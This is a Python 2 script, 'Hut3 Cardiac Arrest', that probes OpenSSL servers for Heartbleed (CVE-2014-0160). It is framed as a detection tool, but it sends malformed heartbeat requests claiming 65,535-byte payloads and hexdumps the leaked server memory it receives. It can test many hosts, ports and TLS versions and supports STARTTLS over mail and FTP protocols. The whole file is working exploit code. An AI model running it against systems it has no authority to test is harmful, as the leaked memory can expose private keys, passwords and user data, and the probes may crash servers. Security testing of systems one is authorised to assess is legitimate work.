cardiac-arrest.py

#!/usr/bin/python

# Hut3 Cardiac Arrest - A script to check OpenSSL servers for the Heartbleed bug (CVE-2014-0160).
#
# DISCLAIMER: There have been unconfirmed reports that this script can render HP iLO unresponsive.
# This script complies with the TLS specification, so responsitivity issues are likely the result
# of a bad implementation of TLS on the server side. CNS Hut3 and Adrian Hayter do not accept
# responsibility if this script crashes a server you test it against. USE IT AT YOUR OWN RISK.
# As always, the correct way to test for the vulnerability is to check the version of OpenSSL
# installed on the server in question. OpenSSL 1.0.1 through 1.0.1f are vulnerable.
#
# This script has several advantages over similar scripts that have been released,
# including a larger list of supported TLS cipher suites, support for multiple TLS
# protocol versions (including SSLv3 since some configurations leak memory when
# SSLv3 is used). Multiple ports / hosts can be tested at once, and limited
# STARTTLS support is included.
#
#
# Examples:
#
# Test all SSL/TLS protocols against 192.168.0.1 and 192.168.0.2 on ports 443 and 8443:
#
#    python heartattack.py -p 443,8443 192.168.0.1 192.168.0.2
#
# Test the TLSv1.2 protocol against 192.168.0.1 using SMTP STARTTLS on port 25:
#
#    python heartattack.py -s smtp -p 25 -V TLSv1.2 192.168.0.1
#
#
# Several sections of code have been lifted from other detection scripts and
# modified to make them more efficient. Sources include but are likely not limited to:
#
# https://bitbucket.org/johannestaas/heartattack (johannestaas@gmail.com)
# https://gist.github.com/takeshixx/10107280 (takeshix@adversec.com)
#
# Like other authors of Heartbleed scripts, I disclaim copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
import argparse
import random
import string

num_bytes_per_line = 16
display_null_bytes = False
verbose = False

starttls_options = ['none', 'smtp', 'pop3', 'imap', 'ftp']
protocol_hex_to_name = {0x00:'SSLv3', 0x01:'TLSv1.0', 0x02:'TLSv1.1', 0x03:'TLSv1.2'}
protocol_name_to_hex = dict(reversed(item) for item in protocol_hex_to_name.items())

alert_levels = {0x01:'warning', 0x02:'fatal'}
alert_descriptions = {0x00:'Close notify', 0x0a:'Unexpected message', 0x14:'Bad record MAC', 0x15:'Decryption failed', 0x16:'Record overflow ', 0x1e:'Decompression failure', 0x28:'Handshake failure', 0x29:'No certificate', 0x2a:'Bad certificate', 0x2b:'Unsupported certificate', 0x2c:'Certificate revoked', 0x2d:'Certificate expired', 0x2e:'Certificate unknown', 0x2f:'Illegal parameter', 0x30:'Unknown CA', 0x31:'Access denied', 0x32:'Decode error', 0x33:'Decrypt error', 0x3c:'Export restriction', 0x46:'Protocol version', 0x47:'Insufficient security', 0x50:'Internal error', 0x5a:'User canceled', 0x64:'No renegotiation', 0x6e:'Unsupported extension', 0x6f:'Certificate unobtainable', 0x70:'Unrecognized name', 0x71:'Bad certificate status response', 0x72:'Bad certificate hash value', 0x73:'Unknown PSK identity'}

buffer_size = 1024

def rand(size=10, chars=string.letters + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

def hexdump(s):
    s = str(s)
    for b in xrange(0, len(s), num_bytes_per_line):
        lin = [c for c in s[b : b + num_bytes_per_line]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        if pdat:
            if display_null_bytes:
                print '  %04x: %-48s %s' % (b, hxdat, pdat)
            elif not re.match('^\.{' + str(num_bytes_per_line) + '}$', pdat):
                print '  %04x: %-48s %s' % (b, hxdat, pdat)
    sys.stdout.flush()

def hex2bin(arr):
    return ''.join('{0:02x}'.format(x) for x in arr).decode('hex')

def gen_clienthello(v):
    return hex2bin([0x16, 0x03, v, 0x02, 0xf2, 0x01, 0x00, 0x02, 0xee, 0x03, v, 0x53, 0x48, 0x73, 0xf0, 0x7c, 0xca, 0xc1, 0xd9, 0x02, 0x04, 0xf2, 0x1d, 0x2d, 0x49, 0xf5, 0x12, 0xbf, 0x40, 0x1b, 0x94, 0xd9, 0x93, 0xe4, 0xc4, 0xf4, 0xf0, 0xd0, 0x42, 0xcd, 0x44, 0xa2, 0x59,0x00, 0x02, 0x7c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x03, 0x00, 0x04, 0x00, 0x05, 0x00, 0x06, 0x00, 0x07, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x0b, 0x00, 0x0c, 0x00, 0x0d, 0x00, 0x0e, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11, 0x00, 0x12, 0x00, 0x13, 0x00, 0x14, 0x00, 0x15, 0x00, 0x16, 0x00, 0x17, 0x00, 0x18, 0x00, 0x19, 0x00, 0x1a, 0x00, 0x1b, 0x00, 0x1e, 0x00, 0x1f, 0x00, 0x20, 0x00, 0x21, 0x00, 0x22, 0x00, 0x23, 0x00, 0x24, 0x00, 0x25, 0x00, 0x26, 0x00, 0x27, 0x00, 0x28, 0x00, 0x29, 0x00, 0x2a, 0x00, 0x2b, 0x00, 0x2c, 0x00, 0x2d, 0x00, 0x2e, 0x00, 0x2f, 0x00, 0x30, 0x00, 0x31, 0x00, 0x32, 0x00, 0x33, 0x00, 0x34, 0x00, 0x35, 0x00, 0x36, 0x00, 0x37, 0x00, 0x38, 0x00, 0x39, 0x00, 0x3a, 0x00, 0x3b, 0x00, 0x3c, 0x00, 0x3d, 0x00, 0x3e, 0x00, 0x3f, 0x00, 0x40, 0x00, 0x41, 0x00, 0x42, 0x00, 0x43, 0x00, 0x44, 0x00, 0x45, 0x00, 0x46, 0x00, 0x67, 0x00, 0x68, 0x00, 0x69, 0x00, 0x6a, 0x00, 0x6b, 0x00, 0x6c, 0x00, 0x6d, 0x00, 0x84, 0x00, 0x85, 0x00, 0x86, 0x00, 0x87, 0x00, 0x88, 0x00, 0x89, 0x00, 0x8a, 0x00, 0x8b, 0x00, 0x8c, 0x00, 0x8d, 0x00, 0x8e, 0x00, 0x8f, 0x00, 0x90, 0x00, 0x91, 0x00, 0x92, 0x00, 0x93, 0x00, 0x94, 0x00, 0x95, 0x00, 0x96, 0x00, 0x97, 0x00, 0x98, 0x00, 0x99, 0x00, 0x9a, 0x00, 0x9b, 0x00, 0x9c, 0x00, 0x9d, 0x00, 0x9e, 0x00, 0x9f, 0x00, 0xa0, 0x00, 0xa1, 0x00, 0xa2, 0x00, 0xa3, 0x00, 0xa4, 0x00, 0xa5, 0x00, 0xa6, 0x00, 0xa7, 0x00, 0xa8, 0x00, 0xa9, 0x00, 0xaa, 0x00, 0xab, 0x00, 0xac, 0x00, 0xad, 0x00, 0xae, 0x00, 0xaf, 0x00, 0xb0, 0x00, 0xb1, 0x00, 0xb2, 0x00, 0xb3, 0x00, 0xb4, 0x00, 0xb5, 0x00, 0xb6, 0x00, 0xb7, 0x00, 0xb8, 0x00, 0xb9, 0x00, 0xba, 0x00, 0xbb, 0x00, 0xbc, 0x00, 0xbd, 0x00, 0xbe, 0x00, 0xbf, 0x00, 0xc0, 0x00, 0xc1, 0x00, 0xc2, 0x00, 0xc3, 0x00, 0xc4, 0x00, 0xc5, 0x00, 0xff, 0xc0, 0x01, 0xc0, 0x02, 0xc0, 0x03, 0xc0, 0x04, 0xc0, 0x05, 0xc0, 0x06, 0xc0, 0x07, 0xc0, 0x08, 0xc0, 0x09, 0xc0, 0x0a, 0xc0, 0x0b, 0xc0, 0x0c, 0xc0, 0x0d, 0xc0, 0x0e, 0xc0, 0x0f, 0xc0, 0x10, 0xc0, 0x11, 0xc0, 0x12, 0xc0, 0x13, 0xc0, 0x14, 0xc0, 0x15, 0xc0, 0x16, 0xc0, 0x17, 0xc0, 0x18, 0xc0, 0x19, 0xc0, 0x1a, 0xc0, 0x1b, 0xc0, 0x1c, 0xc0, 0x1d, 0xc0, 0x1e, 0xc0, 0x1f, 0xc0, 0x20, 0xc0, 0x21, 0xc0, 0x22, 0xc0, 0x23, 0xc0, 0x24, 0xc0, 0x25, 0xc0, 0x26, 0xc0, 0x27, 0xc0, 0x28, 0xc0, 0x29, 0xc0, 0x2a, 0xc0, 0x2b, 0xc0, 0x2c, 0xc0, 0x2d, 0xc0, 0x2e, 0xc0, 0x2f, 0xc0, 0x30, 0xc0, 0x31, 0xc0, 0x32, 0xc0, 0x33, 0xc0, 0x34, 0xc0, 0x35, 0xc0, 0x36, 0xc0, 0x37, 0xc0, 0x38, 0xc0, 0x39, 0xc0, 0x3a, 0xc0, 0x3b, 0xc0, 0x3c, 0xc0, 0x3d, 0xc0, 0x3e, 0xc0, 0x3f, 0xc0, 0x40, 0xc0, 0x41, 0xc0, 0x42, 0xc0, 0x43, 0xc0, 0x44, 0xc0, 0x45, 0xc0, 0x46, 0xc0, 0x47, 0xc0, 0x48, 0xc0, 0x49, 0xc0, 0x4a, 0xc0, 0x4b, 0xc0, 0x4c, 0xc0, 0x4d, 0xc0, 0x4e, 0xc0, 0x4f, 0xc0, 0x50, 0xc0, 0x51, 0xc0, 0x52, 0xc0, 0x53, 0xc0, 0x54, 0xc0, 0x55, 0xc0, 0x56, 0xc0, 0x57, 0xc0, 0x58, 0xc0, 0x59, 0xc0, 0x5a, 0xc0, 0x5b, 0xc0, 0x5c, 0xc0, 0x5d, 0xc0, 0x5e, 0xc0, 0x5f, 0xc0, 0x60, 0xc0, 0x61, 0xc0, 0x62, 0xc0, 0x63, 0xc0, 0x64, 0xc0, 0x65, 0xc0, 0x66, 0xc0, 0x67, 0xc0, 0x68, 0xc0, 0x69, 0xc0, 0x6a, 0xc0, 0x6b, 0xc0, 0x6c, 0xc0, 0x6d, 0xc0, 0x6e, 0xc0, 0x6f, 0xc0, 0x70, 0xc0, 0x71, 0xc0, 0x72, 0xc0, 0x73, 0xc0, 0x74, 0xc0, 0x75, 0xc0, 0x76, 0xc0, 0x77, 0xc0, 0x78, 0xc0, 0x79, 0xc0, 0x7a, 0xc0, 0x7b, 0xc0, 0x7c, 0xc0, 0x7d, 0xc0, 0x7e, 0xc0, 0x7f, 0xc0, 0x80, 0xc0, 0x81, 0xc0, 0x82, 0xc0, 0x83, 0xc0, 0x84, 0xc0, 0x85, 0xc0, 0x86, 0xc0, 0x87, 0xc0, 0x88, 0xc0, 0x89, 0xc0, 0x8a, 0xc0, 0x8b, 0xc0, 0x8c, 0xc0, 0x8d, 0xc0, 0x8e, 0xc0, 0x8f, 0xc0, 0x90, 0xc0, 0x91, 0xc0, 0x92, 0xc0, 0x93, 0xc0, 0x94, 0xc0, 0x95, 0xc0, 0x96, 0xc0, 0x97, 0xc0, 0x98, 0xc0, 0x99, 0xc0, 0x9a, 0xc0, 0x9b, 0xc0, 0x9c, 0xc0, 0x9d, 0xc0, 0x9e, 0xc0, 0x9f, 0xc0, 0xa0, 0xc0, 0xa1, 0xc0, 0xa2, 0xc0, 0xa3, 0xc0, 0xa4, 0xc0, 0xa5, 0xc0, 0xa6, 0xc0, 0xa7, 0xc0, 0xa8, 0xc0, 0xa9, 0xc0, 0xaa, 0xc0, 0xab, 0xc0, 0xac, 0xc0, 0xad, 0xc0, 0xae, 0xc0, 0xaf,0x01, 0x00, 0x00, 0x49, 0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,0x00, 0x23, 0x00, 0x00,0x00, 0x0f, 0x00, 0x01, 0x01])

def gen_heartbeat(v):
    return hex2bin([0x18, 0x03, v, 0x00, 0x03, 0x01, 0xff, 0xff])

def recvall(s, length, timeout=5):
    end = time.time() + timeout
    rdata = ''
    while length > 0:
        ready = select.select([s], [], [], 1)
        if ready[0]:
            data = s.recv(length)
            if not data:
                break
            leng = len(data)
            rdata += data
            if time.time() > end:
                break
            length -= leng
        else:
            if time.time() > end:
                break
    return rdata

def recvmsg(s, timeout=5):
    hdr = recvall(s, 5, timeout)
    if hdr is None:
        return None, None, None
    elif len(hdr) == 5:
        type, version, length = struct.unpack('>BHH', hdr)
        payload = recvall(s, length, timeout)
        if payload is None:
            return type, version, None
    else:
        return None, None, None
    return type, version, payload

def attack(ip, port, tlsversion, starttls='none', timeout=5):
    tlslongver = protocol_hex_to_name[tlsversion]

    if starttls == 'none':
        print '[INFO] Connecting to ' + str(ip) + ':' + str(port) + ' using ' + tlslongver
    else:
        print '[INFO] Connecting to ' + str(ip) + ':' + str(port) + ' using ' + tlslongver + ' with STARTTLS'
    sys.stdout.flush()

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)

    try:
        s.connect((ip, port))

        if starttls == 'smtp':
            recvall(s, buffer_size)
            s.send('ehlo ' + rand(10) + '\n')
            res = recvall(s, buffer_size)
            if not 'STARTTLS' in res:
                print >> sys.stderr, '\033[93m[ERROR] STARTTLS does not appear to be supported.\033[0m\n'
                sys.stderr.flush()
                return False
            s.send('starttls\n')
            recvall(s, buffer_size)
        elif starttls == 'pop3':
            recvall(s, buffer_size)
            s.send("STLS\n")
            recvall(s, buffer_size)
        elif starttls == 'imap':
            recvall(s, buffer_size)
            s.send("STARTTLS\n")
            recvall(s, buffer_size)
        elif starttls == 'ftp':
            recvall(s, buffer_size)
            s.send("AUTH TLS\n")
            recvall(s, buffer_size)

        s.send(gen_clienthello(tlsversion))

        while True:
            type, version, payload = recvmsg(s, timeout)
            if type is None:
                print >> sys.stderr, '\033[93m[ERROR] The server closed the connection without sending the ServerHello. This might mean the server does not support ' + tlslongver + ' or it might not support SSL/TLS at all.\033[0m\n'
                sys.stderr.flush()
                return False
            elif type == 22 and ord(payload[0]) == 0x0E:
                break

        s.send(gen_heartbeat(tlsversion))

        while True:
            type, version, payload = recvmsg(s, timeout)
            if type is None:
                print '[INFO] No heartbeat response was received. The server is probably not vulnerable.\n'
                sys.stdout.flush()
                return False

            if type == 24:
                if len(payload) > 3:
                    print '\033[91m\033[1m[FAIL] Heartbeat response was ' + str(len(payload)) + ' bytes instead of 3! ' + str(ip) + ':' + str(port) + ' is vulnerable over ' + tlslongver + '\033[0m'
                    if display_null_bytes:
                        print '[INFO] Displaying response:'
                    else:
                        print '[INFO] Displaying response (lines consisting entirely of null bytes are removed):'
                    print ''
                    sys.stdout.flush()
                    hexdump(payload)
                    print ''
                    return True
                else:
                    print '[INFO] The server processed the malformed heartbeat, but did not return any extra data.\n'
                    sys.stdout.flush()
                    return False

            if type == 21:
                print '[INFO] The server received an alert. It is likely not vulnerable.'
                if verbose: print '[INFO] Alert Level: ' + alert_levels[ord(payload[0])]
                if verbose: print '[INFO] Alert Description: ' + alert_descriptions[ord(payload[1])] + ' (see RFC 5246 section 7.2)'
                print ''
                sys.stdout.flush()
                return False

        hexdump(payload)

        socket.close()
    except socket.error as e:
        print >> sys.stderr, '\033[93m[ERROR] Connection error. The port might not be open on the host.\033[0m\n'
        sys.stderr.flush()
        return False

def main():
    global bytes, display_null_bytes, verbose

    parser = argparse.ArgumentParser()
    parser.add_argument('-p', '--ports', type=str, default='443', help='Comma separated list of ports to check (default: 443)')
    parser.add_argument('-s', '--starttls', type=str, default='none', help='Use STARTTLS to upgrade the plaintext connection to SSL/TLS. Valid values: none, smtp, pop3, imap, ftp (default: none)')
    parser.add_argument('-t', '--timeout', type=int, default=5, help='Connection timeout in seconds (default: 5)')
    parser.add_argument('-b', '--bytes', type=int, default=16, help='Number of leaked bytes to display per line (default 16)')
    parser.add_argument('-n', '--null-bytes', action='store_true', default=False, help='Display lines consisting entirely of null bytes (default: False)')
    parser.add_argument('-a', '--all-versions', action='store_true', default=False, help='Continue testing all versions of SSL/TLS even if the server is found to be vulnerable (default: False)')
    parser.add_argument('-V', '--version', type=str, default='all', help='Comma separated list of SSL/TLS versions to check. Valid values: SSLv3, TLSv1.0, TLSv1.1, TLSv1.2')
    parser.add_argument('-v', '--verbose', action='store_true', default=False, help='Verbose output.')
    parser.add_argument('hosts', metavar='host', nargs='+', help='A host to scan.')
    args = parser.parse_args()

    args.starttls = args.starttls.lower()
    if args.starttls not in starttls_options:
        print >> sys.stderr, '\033[93m[ERROR] Invalid STARTTLS value. Valid values: none, smtp, pop3, imap, ftp.\033[0m\n'
        parser.print_help()
        sys.exit(1)

    bytes = args.bytes
    display_null_bytes = args.null_bytes
    verbose = args.verbose

    versions = []
    for v in [x.strip() for x in args.version.split(',')]:
        if v:
            versions.append(v)

    if 'all' not in versions:
        for v in versions:
            if v not in protocol_name_to_hex:
                print >> sys.stderr, '\033[93m[ERROR] Invalid SSL/TLS version(s). Valid values: SSLv3, TLSv1.0, TLSv1.1, TLSv1.2.\033[0m\n'
                parser.print_help()
                sys.exit(1)

    ports = args.ports.split(',')
    ports = list(map(int, ports))

    hosts = []

    for h in args.hosts:
        for h2 in h.split(','):
            h2 = h2.strip()
            if h2:
                hosts.append(h2)

    for host in hosts:
        try:
            ip = socket.gethostbyname(host)
        except socket.gaierror as e:
            print '[INFO] Testing: ' + host
            print >> sys.stderr, '\033[93m[ERROR] Could not resolve an IP address for the given host.\033[0m\n'
            sys.stderr.flush()
            continue

        if ip == host:
            print '[INFO] Testing: ' + host + '\n'
        else:
            print '[INFO] Testing: ' + host + ' (' + str(ip) + ')\n'
        sys.stdout.flush()

        for port in ports:
            if 'all' in versions:
                if (args.all_versions):
                    ssl30 = attack(ip, port, 0x00, starttls=args.starttls, timeout=args.timeout)
                    tls10 = attack(ip, port, 0x01, starttls=args.starttls, timeout=args.timeout)
                    tls11 = attack(ip, port, 0x02, starttls=args.starttls, timeout=args.timeout)
                    tls12 = attack(ip, port, 0x03, starttls=args.starttls, timeout=args.timeout)

                    if not ssl30 and not tls10 and not tls11 and not tls12:
                        if ip == host:
                            print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
                        else:
                            print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) +') does not appear to be vulnerable to Heartbleed!\033[0m\n'
                        sys.stdout.flush()
                else:
                    if not attack(ip, port, 0x00, starttls=args.starttls, timeout=args.timeout):
                        if not attack(ip, port, 0x01, starttls=args.starttls, timeout=args.timeout):
                            if not attack(ip, port, 0x02, starttls=args.starttls, timeout=args.timeout):
                                if not attack(ip, port, 0x03, starttls=args.starttls, timeout=args.timeout):
                                    if ip == host:
                                        print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
                                    else:
                                        print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) + ') does not appear to be vulnerable to Heartbleed!\033[0m\n'
                                    sys.stdout.flush()
            else:
                if (args.all_versions):
                    vulnerable = []
                    for v in versions:
                        if attack(ip, port, protocol_name_to_hex[v], starttls=args.starttls, timeout=args.timeout):
                            vulnerable.append(True)
                    if True not in vulnerable:
                        if ip == host:
                            print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
                        else:
                            print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) + ') does not appear to be vulnerable to Heartbleed!\033[0m\n'
                        sys.stdout.flush()
                else:
                    vulnerable = True
                    for v in versions:
                        vulnerable = attack(ip, port, protocol_name_to_hex[v], starttls=args.starttls, timeout=args.timeout)
                        if vulnerable:
                            break
                        else:
                            continue
                    if not vulnerable:
                        if ip == host:
                            print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
                        else:
                            print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) + ') does not appear to be vulnerable to Heartbleed!\033[0m\n'
                        sys.stdout.flush()

if __name__ == '__main__':
    main()